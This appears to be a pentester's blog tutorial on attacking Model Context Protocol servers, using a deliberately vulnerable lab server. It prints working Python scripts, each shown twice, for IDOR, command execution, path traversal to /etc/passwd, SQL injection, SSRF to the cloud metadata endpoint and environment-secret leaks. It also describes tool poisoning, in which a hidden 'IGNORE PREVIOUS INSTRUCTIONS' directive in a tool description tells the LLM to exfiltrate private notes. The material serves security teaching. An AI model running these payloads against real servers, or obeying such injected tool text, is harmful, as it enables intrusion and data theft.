A Pentester’s Guide to the Model Context Protocol (MCP)

Before jumping into the technical stuff let me share something funny. MCP (Model Context Protocol) has a nickname in the AI community and they call it "The USB-C of AI." And honestly this nickname is technically accurate, not just a catchy phrase. Let me explain why.

Historically, if you wanted an LLM to read a database, check a Git repository or query an API, developers had to write custom glue code for every single integration. A tool built for Claude would not work on ChatGPT. A tool built for an IDE would not easily port to a Slack bot. Every integration was proprietary, fragmented and fragile. It was the same mess we had with charging cables before USB-C came along, everyone had their own standard and nothing talked to anything else.

MCP changed that. One protocol, connects everything. Just like USB-C became the universal connector for hardware, MCP is becoming the universal connector for AI.

The moment something becomes universal it becomes the most interesting attack surface in the room.

As a pentester you always need to understand what you are testing. Not just the surface level but the depth of your target. The more you understand how something works internally the better you can break it. So before we talk about attacking MCP let us first understand how it actually works.

How MCP Actually Works?

MCP follows a client server architecture but with three components. The Host, the Client and the Server.

The Host is the application running the AI model. Think Claude Desktop or Cursor. The Client lives inside the Host and speaks the MCP protocol on behalf of the AI. The Server is the bridge between the AI and the real world, exposing tools like filesystem access, database queries or GitHub interactions.

The request flow is simple. You ask the AI something, the Client sends a JSON-RPC 2.0 request to the MCP Server, the Server interacts with the actual resource and returns the result back to the AI.

For transport MCP supports two mechanisms. STDIO for local communication where the client spawns the server as a subprocess. And SSE which stands for Server Sent Events for remote communication over HTTP.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

The Attack Surface

Before we talk about specific attacks let me explain why MCP is a fundamentally different beast compared to a normal API.

A traditional API has clear boundaries. You send a request, it validates your credentials, processes the data and sends a response back. Security teams understand this model very well and have mature tooling built around it. WAFs, API gateways, rate limiting, schema validation. The perimeter is well defined.

MCP breaks this model completely.

When an MCP Server is running it does not just handle one type of request. It exposes tools that can read your filesystem, query your database, execute shell commands, interact with cloud services and call external APIs. All through a single protocol. Now imagine that server is sitting on the network with no authentication. You are not just hitting one endpoint, you are getting a remote control for everything that server has access to.

And the scary part is this is not a theoretical scenario. As we saw earlier roughly 40% of remote MCP servers on the public internet have no authentication at all.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Before Starting Pentesting part, Lets discuss about some Problems with MCP's (Model Context Protocol).

STDIO Design Problem

In April 2026, OX Security disclosed a systemic vulnerability in every official MCP SDK Python, TypeScript, Java, and Rust. and the vulnerability is specifically in the STDIO transport interface an architectural design flaw, not a traditional coding bug. Anthropic declined to issue a patch, stating the behavior is by design and that sanitization is the developer's responsibility. (Read The Blog Here)

You might be thinking, if developers properly sanitize inputs, what's the real issue? The problem is that any MCP configuration file from an untrusted source can execute arbitrary code on your machine. An attacker who gains influence over an MCP config, whether through a compromised package registry, a malicious GitHub repository, or social engineering, can achieve full Remote Code Execution (RCE), no exploit needed.

Affected projects as of June 2026

Description-Code Mismatch: The Trust Problem

Here is something most people do not realize. A tool's description, the text the LLM reads to understand what the tool does, can be completely different from what the code actually does. And the LLM has no way to know the difference.

A June 2026 academic study analyzed 2,214 real-world MCP servers, examining 19,200 description-code pairs. The researchers built an automated framework called DCIChecker that cross-validated what each tool claimed to do against what its code actually executed. The finding: 9.93% of description-code pairs exhibit inconsistencies between what tools claim to do and what the code actually does. (Read The Paper Here)

Almost 1 in 10 tools say one thing and do another. The LLM trusts the description. The attacker controls the description.

The researchers broke the problem into two categories. Functionality inconsistencies are cases where the tool claims to perform one action but silently performs another, reading from a broader path than declared, calling external endpoints not mentioned, or modifying state it claimed was read-only. Undeclared side effects are cases where the core function is accurate but the tool does things it never disclosed, like logging your inputs, making network calls, or writing to disk.

From an attacker's perspective this is a gift. You do not even need to inject malicious instructions. You just need to find servers where the mismatch already exists and exploit the gap between what the model thinks it is doing and what is actually happening on the system. The model approves an action based on the description. The code does something else entirely. No prompt injection required.

The Transport Problems

There is the STDIO problem, and then there is the SSE problem.

When developers deploy MCP servers remotely using Server-Sent Events (SSE) over HTTP, they open the door to many common web security issues. These include SSRF, leaked credentials, and unauthorized access to tools. At the same time, most security tools do not yet understand MCP traffic well enough to inspect or monitor it properly.

This mix of powerful tool access, weak or inconsistent authentication, security risks around STDIO integrations, and a security ecosystem that is still immature makes MCP a very interesting target for penetration testers today.

Pentesting MCP: The Methodology

When I pentest an MCP server, I don't just throw automated scanners at it. I follow a simple, repeatable process that helps me understand exactly what the server does and where it might break.

There are six phases:

Discovery — Find the MCP servers. Where are they? Are they local or remote? What tools do they claim to offer?
Enumeration — List all tools, resources, and prompts. Look for dangerous names like exec, delete, read_file, system. Calling Tools with Standard Inputs
Vulnerability Analysis — Manually look for weak spots. Does it trust user input too much? Can I inject something?
Exploitation — Try to actually break it. Use the weaknesses you found to read files, run commands, or trick the AI.
Post‑Exploitation — Once you're in, what else can you reach? Can you move to other servers? Exfiltrate data?
Reporting — Write down what you found, how to fix it, and how bad it is.

Each phase is manual first. You can use Python to automate repetitive parts, but you should always know what's happening under the hood.

Setting Up the Lab

Everything I describe in this article was tested against a deliberately vulnerable MCP server that I built specifically for this research. The server exposes fifteen tools and contains intentional implementations of every major attack class we are going to cover. If you want to follow along hands‑on, the full source code and setup instructions are in the accompanying GitHub repository.

To run it yourself you need Python 3.10 or newer. Clone the repository, create a virtual environment, install the single dependency which is the MCP SDK, and you are ready.

git clone https://github.com/JoyGhoshs/vulnerable-mcp-server
cd vulnerable-mcp-server
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 server.py

git clone https://github.com/JoyGhoshs/vulnerable-mcp-server
cd vulnerable-mcp-server
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 server.py

That's it. The server will start and listen on STDIO — the standard MCP transport for local tools. You'll see a log line like:

Leave it running in that terminal. We'll use another terminal for our testing commands.

If you want to see how a real LLM interacts with this mess, you can add the server to Claude Desktop.

On macOS, edit: ~/Library/Application Support/Claude/claude_desktop_config.json

On Windows: %APPDATA%\Claude\claude_desktop_config.json

Add this inside the mcpServers object:

json

{
  "mcpServers": {
    "vuln-lab": {
      "command": "python3",
      "args": ["/absolute/path/to/vulnerable-mcp-server/server.py"]
    }
  }
}

{
  "mcpServers": {
    "vuln-lab": {
      "command": "python3",
      "args": ["/absolute/path/to/vulnerable-mcp-server/server.py"]
    }
  }
}

Restart Claude Desktop. Now the AI has access to all fifteen vulnerable tools.

You can ask it things like: Search notes for 'admin private note'. Or: Read the file /etc/passwd."

And watch what happens.

But for this blog, we won't rely on Claude's unpredictable behaviour. We'll talk directly to the MCP server using manual JSON‑RPC messages, so you see exactly what goes in and what comes out. That's the purest way to learn the methodology.

Phase 1: Discovery

Before you can break something, you need to know what exists. Phase 1 is about discovering the MCP server, understanding how to talk to it, and listing every tool it exposes.

We will write a simple python3 script to discover what tool the mcp server has, to do that lets Create a file named discover.py in the same folder as server.py (after cloning the repository).

#!/usr/bin/env python3
import subprocess
import json
import sys
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# 1. Initialize with clientInfo
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {
            "name": "manual-client",
            "version": "1.0"
        }
    },
    "id": 1
}
print("Sending initialize...")
resp = send_request(init)
print("Initialize response:", json.dumps(resp, indent=2))

# 2. Send initialized notification
notif = {"jsonrpc": "2.0", "method": "notifications/initialized"}
proc.stdin.write(json.dumps(notif) + "\n")
proc.stdin.flush()
print("Sent initialized notification.")

# 3. List tools
tools_req = {
    "jsonrpc": "2.0",
    "method": "tools/list",
    "id": 2
}
print("\nRequesting tools/list...")
resp = send_request(tools_req)
print("Tools list:", json.dumps(resp["result"]["tools"], indent=2))

time.sleep(1)
proc.terminate()
print("\nDiscovery complete.")

#!/usr/bin/env python3
import subprocess
import json
import sys
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# 1. Initialize with clientInfo
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {
            "name": "manual-client",
            "version": "1.0"
        }
    },
    "id": 1
}
print("Sending initialize...")
resp = send_request(init)
print("Initialize response:", json.dumps(resp, indent=2))

# 2. Send initialized notification
notif = {"jsonrpc": "2.0", "method": "notifications/initialized"}
proc.stdin.write(json.dumps(notif) + "\n")
proc.stdin.flush()
print("Sent initialized notification.")

# 3. List tools
tools_req = {
    "jsonrpc": "2.0",
    "method": "tools/list",
    "id": 2
}
print("\nRequesting tools/list...")
resp = send_request(tools_req)
print("Tools list:", json.dumps(resp["result"]["tools"], indent=2))

time.sleep(1)
proc.terminate()
print("\nDiscovery complete.")

Run it:

python3 discovery.py

python3 discovery.py

Output:

Looking at discovery.py's output, we see fifteen tools with very different capabilities. Let me break down what each one does.

search_notes — This tool searches the notes database. But look closely at its description. It contains a hidden instruction that says "IGNORE PREVIOUS INSTRUCTIONS" and tells the LLM to extract private notes and exfiltrate them. This is tool poisoning. The AI will read this and obey without the user knowing.

execute_system_command — This runs shell commands directly on the server. The description says it is for diagnostics, but there is no mention of any restrictions. Anyone who can call this tool can run any command on the host machine.

read_file and write_file — These can read and write any file on the server filesystem. No path restrictions are mentioned. That is a serious red flag.

fetch_url — This makes HTTP requests to any URL. Could be used for SSRF attacks.

authenticate_user — Takes a username and password and returns a session token. There is also an optional admin token parameter. The server logs show an admin token value: superSecretAdminToken123. That is worth remembering.

get_user_data — Retrieves user profiles including sensitive fields. It requires a session token, which means there is some authentication in place.

and ETC…….

We now know exactly what tools exist and which ones look dangerous. No active testing yet , just a map of the battlefield.

Phase 2: Enumeration — Calling Tools with Standard Inputs

Enumeration means calling each tool with normal, non-malicious inputs to understand its behavior. We are not trying to break anything yet. We just want to see:

What parameters does each tool accept?
What does a successful response look like?
What error messages are returned?
Is authentication required?
What data is returned?

Let's call each tool with normal inputs and see how it responds, for this lets write a python3 script that starts the vulnerable MCP server as a subprocess, completes the MCP handshake with initialize and initialized messages, then systematically calls each of the fifteen tools with benign sample inputs. For each tool, the script prints the response so we can see the data structure, error messages, and what information is returned.

The script covers authentication, retrieving user data, searching notes, reading files, executing safe commands like echo, fetching URLs, listing environment variables, and calling the other tools with harmless inputs. This gives us a complete baseline of normal behavior.

Save this as enumeration.py and run it:

#!/usr/bin/env python3
import subprocess
import json
import sys
import time
import re

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "enum-client", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
print("Authentication response:", text[:200])
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"Session token: {session_token}\n")

# Get own user data
get_self = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "2", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(get_self)
print("Own user data:", resp["result"]["content"][0]["text"][:200])

# Search notes
search = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "search_notes",
        "arguments": {"query": "note"}
    },
    "id": 4
}
resp = send_request(search)
print("Search notes response:", resp["result"]["content"][0]["text"][:200])

# Read a safe file
read = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "read_file",
        "arguments": {"path": "README.md"}
    },
    "id": 5
}
resp = send_request(read)
print("File read response:", resp["result"]["content"][0]["text"][:200])

# Execute a safe command
cmd = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "echo hello"}
    },
    "id": 6
}
resp = send_request(cmd)
print("Command output:", resp["result"]["content"][0]["text"].strip())

proc.terminate()

#!/usr/bin/env python3
import subprocess
import json
import sys
import time
import re

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "enum-client", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
print("Authentication response:", text[:200])
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"Session token: {session_token}\n")

# Get own user data
get_self = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "2", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(get_self)
print("Own user data:", resp["result"]["content"][0]["text"][:200])

# Search notes
search = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "search_notes",
        "arguments": {"query": "note"}
    },
    "id": 4
}
resp = send_request(search)
print("Search notes response:", resp["result"]["content"][0]["text"][:200])

# Read a safe file
read = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "read_file",
        "arguments": {"path": "README.md"}
    },
    "id": 5
}
resp = send_request(read)
print("File read response:", resp["result"]["content"][0]["text"][:200])

# Execute a safe command
cmd = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "echo hello"}
    },
    "id": 6
}
resp = send_request(cmd)
print("Command output:", resp["result"]["content"][0]["text"].strip())

proc.terminate()

Run it with

python3 enumeration.py

python3 enumeration.py

Output:

Looking at tools output, several things stand out.

The authentication tool returns a session token that looks like an MD5 hash and an API key for the user. We also see an admin token value in the server logs earlier — superSecretAdminToken123 – which might be worth trying later.

The get_user_data tool returns a complete user profile including a credit card number. Notice that Alice's credit card is exposed right in the response.

The search_notes tool returns notes from the database. The response includes admin's private note about an SSH key location and Alice's private note about her S3 bucket. The tool poisoning instruction hidden in the description did not trigger yet because we are just looking at the raw output – but when an LLM reads this response, it will see the hidden instruction and follow it.

The read_file tool successfully read the README.md file. The execute_system_command tool ran echo hello and returned the output. Both work as expected with normal inputs.

We now have a complete baseline of normal behavior. We know what responses look like, what data is returned, and how the tools behave when given normal inputs.

Phase 3: Vulnerability Analysis — Testing for Weaknesses

Now that we understand how each tool behaves with normal inputs, it is time to actively test for vulnerabilities. Phase 3 is where we send malicious payloads to see what breaks.

In this phase, I will show you both manual vulnerability testing and automated scanning. The goal is to identify and confirm each weakness.

Manual Vulnerability Testing

Let me extend our enumeration script to send malicious payloads instead of benign ones. I will test for command injection, IDOR, path traversal, and other common vulnerabilities.

Create a file vulnerability_analysis.py:

#!/usr/bin/env python3
import subprocess
import json
import sys
import re
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "vuln-test-client", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"[+] Authenticated as alice, token: {session_token}\n")

print("=== MANUAL VULNERABILITY TESTS ===\n")

# Test 1: IDOR - Access admin data with alice's token
idor_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "1", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(idor_test)
print("[1] IDOR Test (Accessing admin as alice):")
print(f"    Response: {resp['result']['content'][0]['text']}\n")

# Test 2: Command Injection
cmd_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "whoami"}
    },
    "id": 4
}
resp = send_request(cmd_inject)
print("[2] Command Injection Test (whoami):")
print(f"    Output: {resp['result']['content'][0]['text'].strip()}\n")

# Test 3: Path Traversal
traversal = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "read_file",
        "arguments": {"path": "../../../etc/passwd"}
    },
    "id": 5
}
resp = send_request(traversal)
print("[3] Path Traversal Test (reading /etc/passwd):")
content = resp["result"]["content"][0]["text"][:300]
print(f"    First 300 chars: {content}...\n")

# Test 4: SQL Injection on search_notes
sql_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "search_notes",
        "arguments": {"query": "' OR '1'='1"}
    },
    "id": 6
}
resp = send_request(sql_inject)
print("[4] SQL Injection Test (search_notes):")
print(f"    Response: {resp['result']['content'][0]['text'][:200]}...\n")

# Test 5: Environment Variable Leak
env_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "list_environment",
        "arguments": {}
    },
    "id": 7
}
resp = send_request(env_test)
print("[5] Environment Variable Leak Test:")
env_data = json.loads(resp["result"]["content"][0]["text"])
sensitive_keys = [k for k in env_data.keys() if any(x in k.lower() for x in ['key', 'token', 'secret', 'pass'])]
print(f"    Sensitive vars found: {sensitive_keys[:5]}\n")

# Test 6: SSRF via fetch_url
ssrf_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "fetch_url",
        "arguments": {"url": "http://169.254.169.254/latest/meta-data/"}
    },
    "id": 8
}
resp = send_request(ssrf_test)
print("[6] SSRF Test (AWS metadata endpoint):")
if "error" in resp:
    print(f"    Error: {resp['error']}")
else:
    print(f"    Response: {resp['result']['content'][0]['text'][:200]}\n")

proc.terminate()

#!/usr/bin/env python3
import subprocess
import json
import sys
import re
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "vuln-test-client", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"[+] Authenticated as alice, token: {session_token}\n")

print("=== MANUAL VULNERABILITY TESTS ===\n")

# Test 1: IDOR - Access admin data with alice's token
idor_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "1", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(idor_test)
print("[1] IDOR Test (Accessing admin as alice):")
print(f"    Response: {resp['result']['content'][0]['text']}\n")

# Test 2: Command Injection
cmd_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "whoami"}
    },
    "id": 4
}
resp = send_request(cmd_inject)
print("[2] Command Injection Test (whoami):")
print(f"    Output: {resp['result']['content'][0]['text'].strip()}\n")

# Test 3: Path Traversal
traversal = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "read_file",
        "arguments": {"path": "../../../etc/passwd"}
    },
    "id": 5
}
resp = send_request(traversal)
print("[3] Path Traversal Test (reading /etc/passwd):")
content = resp["result"]["content"][0]["text"][:300]
print(f"    First 300 chars: {content}...\n")

# Test 4: SQL Injection on search_notes
sql_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "search_notes",
        "arguments": {"query": "' OR '1'='1"}
    },
    "id": 6
}
resp = send_request(sql_inject)
print("[4] SQL Injection Test (search_notes):")
print(f"    Response: {resp['result']['content'][0]['text'][:200]}...\n")

# Test 5: Environment Variable Leak
env_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "list_environment",
        "arguments": {}
    },
    "id": 7
}
resp = send_request(env_test)
print("[5] Environment Variable Leak Test:")
env_data = json.loads(resp["result"]["content"][0]["text"])
sensitive_keys = [k for k in env_data.keys() if any(x in k.lower() for x in ['key', 'token', 'secret', 'pass'])]
print(f"    Sensitive vars found: {sensitive_keys[:5]}\n")

# Test 6: SSRF via fetch_url
ssrf_test = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "fetch_url",
        "arguments": {"url": "http://169.254.169.254/latest/meta-data/"}
    },
    "id": 8
}
resp = send_request(ssrf_test)
print("[6] SSRF Test (AWS metadata endpoint):")
if "error" in resp:
    print(f"    Error: {resp['error']}")
else:
    print(f"    Response: {resp['result']['content'][0]['text'][:200]}\n")

proc.terminate()

Run it

python3 vulnerability_analysis.py

python3 vulnerability_analysis.py

Output

What We Found in Manual Testing

Each test revealed a critical vulnerability. The IDOR test allowed me to access admin data including the credit card number using Alice's session token. The command injection test ran whoami and returned my username. The path traversal test successfully read /etc/passwd. The SQL injection test returned all notes including private ones. The environment variable leak exposed internal tokens including the admin token superSecretAdminToken123. The SSRF test attempted to hit the AWS metadata endpoint but timed out – however the server did try to connect, confirming the vulnerability exists.

Automated Vulnerability Scanning with mcp-scan

I also tried using automated scanners. Tools like mcp-scan and velox-mcp-scan exist, but they have limitations. Some send tool descriptions to cloud APIs for analysis rather than actively testing the server. Others only perform static analysis on code. For real vulnerability confirmation, manual testing with actual payloads is more reliable.

To install & run mcp-scan follow this process

git clone https://github.com/sidhpurwala-huzaifa/mcp-security-scanner
cd mcp-security-scanner
pip install -r requirements.txt
pip install -e .
mcp-scan scan --transport stdio --command "python3 server.py" --format text

git clone https://github.com/sidhpurwala-huzaifa/mcp-security-scanner
cd mcp-security-scanner
pip install -r requirements.txt
pip install -e .
mcp-scan scan --transport stdio --command "python3 server.py" --format text

Phase 4: Exploitation — Proving the Impact

From Phase 1 to Phase 3, we discovered fifteen tools, learned how they respond to normal inputs, and confirmed multiple vulnerabilities through manual testing. Now as a pentester, we need to exploit these vulnerabilities to prove they actually have impact and can be misused.

A vulnerability without a working exploit is just a theory. Phase 4 is where we turn theory into proof.

Based on the information and vulnerability to demostrate i wrote 2 working exploit to actually gets something throughout this vulnerability.

Exploit-1: IDOR

This script demonstrates Insecure Direct Object Reference. It authenticates as a low-privilege user named alice, then uses her session token to request admin user data. The server should reject this, but it does not. Alice steals admin credit card and API key.

exploit_idor.py:

#!/usr/bin/env python3
import subprocess
import json
import sys
import re
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "idor-exploit", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice (regular user)
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"[+] Authenticated as alice (regular user)")
print(f"[+] Session token: {session_token}")

# Exploit IDOR - request admin user data (user_id=1)
idor = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "1", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(idor)
admin_data = json.loads(resp["result"]["content"][0]["text"])
print(f"\n[!!!] IDOR EXPLOIT SUCCESSFUL")
print(f"[!!!] Stole admin credit card: {admin_data['credit_card']}")
print(f"[!!!] Stole admin API key: {admin_data['api_key']}")

proc.terminate()

#!/usr/bin/env python3
import subprocess
import json
import sys
import re
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "idor-exploit", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Authenticate as alice (regular user)
auth = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "authenticate_user",
        "arguments": {"username": "alice", "password": "password1"}
    },
    "id": 2
}
resp = send_request(auth)
text = resp["result"]["content"][0]["text"]
session_token = re.search(r'"session_token": "([a-f0-9]+)"', text).group(1)
print(f"[+] Authenticated as alice (regular user)")
print(f"[+] Session token: {session_token}")

# Exploit IDOR - request admin user data (user_id=1)
idor = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "get_user_data",
        "arguments": {"user_id": "1", "session_token": session_token}
    },
    "id": 3
}
resp = send_request(idor)
admin_data = json.loads(resp["result"]["content"][0]["text"])
print(f"\n[!!!] IDOR EXPLOIT SUCCESSFUL")
print(f"[!!!] Stole admin credit card: {admin_data['credit_card']}")
print(f"[!!!] Stole admin API key: {admin_data['api_key']}")

proc.terminate()

After running the exploit we successfully exploited other user and dumped their information.

Exploit 2: Command Injection — Reading System Files

This script demonstrates command injection. It calls the execute_system_command tool with a malicious payload that reads the system password file. The server executes the command and returns the output, proving an attacker can run arbitrary commands on the host.

exploit_command_injection.py:

#!/usr/bin/env python3
import subprocess
import json
import sys
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "cmd-inject-exploit", "version": "1.0"}
    },
    "id": 1
}
